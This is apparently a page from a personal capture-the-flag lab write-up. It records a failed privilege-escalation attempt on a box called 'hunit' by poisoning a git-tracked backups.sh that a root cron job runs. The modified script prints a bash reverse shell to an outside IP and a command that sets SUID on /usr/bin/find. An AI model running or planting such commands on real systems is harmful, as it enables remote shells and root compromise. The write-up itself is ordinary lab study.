4 fail privesc dademola-user git-repo

*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh

# there is a directroy git-server 
[dademola@hunit ~]$ ls -la /
[truncated]
drwxr-xr-x   7 git  git   4096 Nov  6  2020 git-server

# lets clone and see 
[dademola@hunit ~]$ git clone file:///git-server/
Cloning into 'git-server'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done.

[dademola@hunit git-server]$ ls -la
total 20
drwxr-xr-x 3 dademola dademola 4096 Sep  9 02:01 .
drwx------ 6 dademola dademola 4096 Sep  9 02:01 ..
drwxr-xr-x 8 dademola dademola 4096 Sep  9 02:01 .git
-rw-r--r-- 1 dademola dademola    0 Sep  9 02:01 NEW_CHANGE
-rw-r--r-- 1 dademola dademola   63 Sep  9 02:01 README
-rw-r--r-- 1 dademola dademola   34 Sep  9 02:01 backups.sh

# checking history of commits
[dademola@hunit git-server]$ git log
commit f295f14322f75bb3ffa07ff15afb6ca1d98e0bcd (HEAD -> master, origin/master, origin/HEAD)
Author: Dademola <dade@local.host>
Date:   Thu Nov 5 21:05:58 2020 -0300

    testing

commit c71132590f969b535b315089f83f39e48d0021e2
Author: Dademola <dade@local.host>
Date:   Thu Nov 5 20:59:48 2020 -0300

    testing

commit 8c0bc9aa81756b34cccdd3ce4ac65091668be77b
Author: Dademola <dade@local.host>
Date:   Thu Nov 5 20:54:50 2020 -0300

    testing

commit 574eba09bb7cc54628f574a694a57cbbd02befa0
Author: Dademola <dade@local.host>
Date:   Thu Nov 5 20:39:14 2020 -0300

    Adding backups

commit 025a327a0ffc9fe24e6dd312e09dcf5066a011b5
Author: Dademola <dade@local.host>
Date:   Thu Nov 5 20:23:04 2020 -0300

    Init

[dademola@hunit git-server]$ cat backups.sh
#!/bin/bash
#
#
# # Placeholder
#
[dademola@hunit git-server]$ cat README
Simple repo to review and commit changes to the sever scripts.
[dademola@hunit git-server]$ cat NEW_CHANGE
# empty

# pull.shis basically cloning the git-server
# and root-cron is running backup.sh

# update backups.sh
[dademola@hunit git-server]$ cat backups.sh
!#/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.49.136/18030 0>&1' &
chmod +s /usr/bin/find;

# adding file to git
[dademola@hunit git-server]$ git add backups.sh

# commit to repo 
[dademola@hunit git-server]$ git commit -m "kashz"
Author identity unknown
*** Please tell me who you are.
Run
  git config --global user.email "you@example.com"
  git config --global user.name "Your Name"

to set your account's default identity.
Omit --global to set the identity only in this repository.

fatal: unable to auto-detect email address (got 'dademola@hunit.(none)')

# setting config
[dademola@hunit git-server]$ git config --global user.name "kashz"
[dademola@hunit git-server]$ git config --global user.email "kashz"

[dademola@hunit git-server]$ git commit -m "kashz"
[master f96f030] kashz
 1 file changed, 6 insertions(+), 5 deletions(-)
 
# push to origin
[dademola@hunit git-server]$ git push -u origin
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 287 bytes | 287.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
error: remote unpack failed: unable to create temporary object directory
To file:///git-server/
 ! [remote rejected] master -> master (unpacker error)
error: failed to push some refs to 'file:///git-server/'

# fails as we don't have perms

# using git user to perform this
Previous5 privesc git-user git-repo > root Next3 box enum dademola
Last updated 3 years ago